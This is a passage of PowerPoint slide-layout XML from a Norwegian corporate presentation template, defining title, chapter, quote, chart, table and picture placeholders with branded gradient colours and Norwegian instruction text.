              <a:t>Sett inn agenda/tittel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6CA68C-8A7C-4C39-962A-2017D8F347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1"/>
            <a:ext cx="10749412" cy="4078404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541338" indent="-276225"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nb-NO" noProof="0"/>
              <a:t>Tekst – Tahoma 20pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188523987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CD0C31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0" y="-1297"/>
            <a:ext cx="6089904" cy="6114312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="tx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B9C6A43-9882-44C2-9457-A2617A4138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chemeClr val="tx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6" name="Connecteur droit 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{156CB738-4016-4654-8FC6-3D9653A3361F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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC841E41-B260-4AD9-A20A-BA7314B6E808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14728491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00A188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00A188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1"/>
            <a:ext cx="6090168" cy="6120962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="00A188"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="95C11F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ED532FE-CE64-4E37-9E0C-398EB43B3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00A188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0CEB51FB-527E-4C06-BC31-C335491E7E24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94DFCB5B-C30B-4802-8F4E-A4B742BEDC3E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15474769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8D1D8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8D1D82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0" y="-1"/>
            <a:ext cx="6090168" cy="6113016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="8D1D82"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="EA5599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8693DB9-AE91-499C-8FDF-767A3AF446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8D1D8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FAE1DBC9-0D0D-4153-8691-C6058F291D79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AD375C31-2EEB-475A-B017-05789C50ED1D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26807756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rgbClr val="007AC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rgbClr val="007AC2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1"/>
            <a:ext cx="6090168" cy="6120962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="007AC2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="32ABD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7310C1A2-8C49-452B-AFB5-6380B35F60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rgbClr val="007AC2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8" name="Connecteur droit 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CE8F2D8-97B4-470A-A395-FBEF3309BBA6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0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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DA0067-76E2-4030-AC87-45E435BA9A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="-45791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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5015191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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9855EAE7-49DB-4EDD-97CF-B2992F550A65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0" y="0"/>
            <a:ext cx="6094800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BF3A9F-5739-4B40-A377-C403E92DB7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18979" y="2916076"/>
            <a:ext cx="4851661" cy="1800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36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noProof="0"/>
              <a:t>Sett inn kapitteloverskrift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C7A5F77-9A92-46CF-AF0E-296CA94F05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618979" y="4849847"/>
            <a:ext cx="4851661" cy="288000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="0" cap="none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nb-NO" noProof="0"/>
              <a:t>Sett inn undertittel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7DD6A663-941F-487A-A112-82ED950A6F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18979" y="1116000"/>
            <a:ext cx="2880000" cy="1620000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="13500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>NN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connecteur droit 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E338985B-7FA2-4B70-8AE1-C80DE9ABCBF1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873461"/>
            <a:ext cx="0" cy="41587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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C826941C-98E4-4E14-85CE-BEB686DCBBBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="827670"/>
            <a:ext cx="2836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Rediger NN-boks for å endre kapittelnummer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F01AC1-B51C-4FA5-832F-0C2E3CF33A42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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCD7981-3A20-4AD2-A780-5F210A29ACC8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30855669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E3D32EC-BF96-45E5-A2F1-339C9FD08196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2658679" y="-2666174"/>
            <a:ext cx="6867146" cy="12199494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="D5121E"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="EF7D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E5A672-27AE-5741-885A-E2AE8FCC1E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108000" tIns="0" rIns="10800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14D9A0-763E-B540-959D-A7DBA20C99D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253511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4A9F7-26C5-4694-A296-7076D5CEB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780674"/>
            <a:ext cx="10749412" cy="4345867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468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30B3B81-CB18-49F2-A0E3-637EFF665D9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F4AE-C967-4346-99C5-1B876420959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83AE5-597B-4E3F-BC6D-DD2BE2269DB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9136" y="1264898"/>
            <a:ext cx="10749411" cy="360000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="36000"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Undertittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2566792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grø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FC2CFAF-3615-4B93-88C1-4E07067D919B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00A188"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="95C11F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91DC36-E3F1-4A44-861F-6B66A9C6FC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C6395CA-435A-4AB1-897D-E2D577EB5B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4267436770"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf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li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1CCD89C-F78D-8847-AE62-0D0BDB42007D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8D1D82"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E9559B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05C668-50ED-4548-AB7C-2DBE31F554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5F61F8C-DBFC-47D1-9863-75A257CB3E3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3587895095"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf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farge bl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465584-E18E-4F45-8798-1F711D399DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2658680" y="-2675320"/>
            <a:ext cx="6867146" cy="12199494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="50000">
                <a:srgbClr val="007AC2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="32ABD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CFF3D7-C690-ED43-A7D5-AD9AB27865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51240AC-75AC-4288-951E-987B81E37E8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4588041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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322970054"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf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lbilde sett i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2"/>
            <a:ext cx="12191999" cy="6858001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1041E80-6F32-49C2-B007-50C27C0C28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55892" y="6138831"/>
            <a:ext cx="1737392" cy="221171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03B16C72-3BE5-418A-9062-3FA3E675550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0562" y="998500"/>
            <a:ext cx="10170876" cy="1412622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="576000" rIns="0" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="5400" b="1" i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nb-NO" noProof="0"/>
              <a:t>“Sett inn tekst eller sitat”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA96853-84A2-45AE-9389-966EA584A193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="744262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Place a black square shape with transparency of e.g. 70% on top of the photo to make text easier to read.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF34FE1-7570-4E04-B426-EDA0DD7D6EA2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1380433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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E1F55D-C222-43C8-B8D9-379A306E8AA9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18909902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d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Espace réservé pour une image  2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71E3310-2B05-4AE1-AFDF-FED61D7DC815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0" y="-1"/>
            <a:ext cx="12191999" cy="61056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EF854658-8F54-49B4-B9CE-8D1C5128E98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64578" y="-1"/>
            <a:ext cx="5627422" cy="6105599"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="23000">
                <a:srgbClr val="252525">
                  <a:alpha val="22000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:alpha val="34000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="864000" tIns="1188000" rIns="648000" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0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/>
              <a:t>Tekst – Tahoma 28pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D25ED0-803F-47E1-9A70-0C6AC10A9C2F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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA474C42-CC2D-4029-8B79-E99B1C359EF6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510412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graphique 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2014B7E-6734-44D5-8300-435BC39AD7F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72000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6" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299435" y="-374857"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D512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7" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593138" y="-374857"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E955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8" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892573" y="-374857"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8D1D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9" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187264" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A1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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486699" y="-374907"/>
            <a:ext cx="252000" cy="252000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="95C1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21" name="ZoneTexte 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733619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diagrammer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Connecteur droit 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12465934" y="0"/>
            <a:ext cx="0" cy="19026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ZoneTexte 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="-86735"/>
            <a:ext cx="283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Klikk på ikonene for å lage et diagram.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Espace réservé du graphique 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B9F7F5F-BDEC-C146-8756-2D043461223D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434745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2" name="Espace réservé du graphique 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E04F0A-8752-F54C-B3B5-498806AEB2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7974900" y="2036618"/>
            <a:ext cx="3495740" cy="3609057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2" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2DB47F-69AC-4AA6-B56A-970E502035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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176234967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ableau 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75B041A-8574-4B31-93E5-C721F617AC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725488" y="1772921"/>
            <a:ext cx="10741025" cy="4114166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9" name="ZoneTexte 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555101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tabell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7095" y="-374907"/>
            <a:ext cx="252000" cy="2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13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="306530" y="-374907"/>
            <a:ext cx="252000" cy="252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15" name="Connecteur droit 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12465934" y="0"/>
            <a:ext cx="0" cy="190264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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="-86735"/>
            <a:ext cx="2836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Klikk på ikonet for å legge til en tabell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61462B12-59CA-4EA6-988A-7399D0A3449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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35832219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titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53555944-260F-4CAA-9A48-4C566A1CB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36" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD2256F-5DBA-45F8-B100-62F2345ED5C9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149628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7" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C88D661-E981-4AB9-B8F0-1B6DCB72B9AC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3733763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8" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5BEC390-94BA-4733-BFCE-1725AF927AEC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318610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9" name="Picture Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E432C7-7D01-4A34-96C3-628D82F7A2E5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902896" y="2230963"/>
            <a:ext cx="2038273" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350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40" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7DA5DE4-EA5D-4987-B8A8-05277EBFC1A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49964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1" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30BA9B33-E8D0-46C1-A557-243920348EA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49964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2" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03DBFC53-54D5-4D65-9A57-BC3780718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34099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3" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB7A844-9B15-4708-87C2-C5465E9DF15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099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4" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A5EF7C-3E12-42F5-9B55-8022DC21B00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318946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5" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{237C0EC9-7EB7-46D6-88F1-E4218324344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318946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6" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0F0DFB-D124-48D0-B0D2-B61224F6CC3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903232" y="4551675"/>
            <a:ext cx="2037600" cy="432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7" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837DEB63-DABC-4C79-BA78-ECCEA7949C4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903232" y="5017859"/>
            <a:ext cx="2037600" cy="20716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20" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB26255-54F7-494A-B629-5E70BCF4DD99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F36468-952C-4247-9369-D2A5D64C4127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21" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0DC1B7-5ABB-4F49-927E-1CCA2707844A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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F7436C-0832-417C-ABED-BD689A177615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289592098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space réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53555944-260F-4CAA-9A48-4C566A1CBA4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E7DE8BFA-8798-470C-8DCC-72B897CE001C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1202413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5" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9316B82F-D349-4D62-ACB3-CEB79EF837CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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2907454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E1BFCDF-6F77-4EEE-BC58-129807E86CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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4630226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7" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB263508-B818-4D3F-A769-9443ED685432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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6352573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8" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EEFBED0-13AE-49CD-97E3-67A9BB0A1A6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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8050806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CBBFDE64-C3C0-4A8B-ACF3-F681877BBEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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9777620" y="1779005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id="{9899E672-6179-4580-BB41-40E5E0C6BAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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1202413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1" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B602FB1-3B88-4FBC-8776-70B1AD6C70BE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2907454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408CEFCE-B6FE-4E24-A481-E74098921C74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4630226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3" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7169A979-0BFF-4E98-AD5D-1E16B41BF484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6352573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4" name="Picture Placeholder 9">
            <a:extLst>
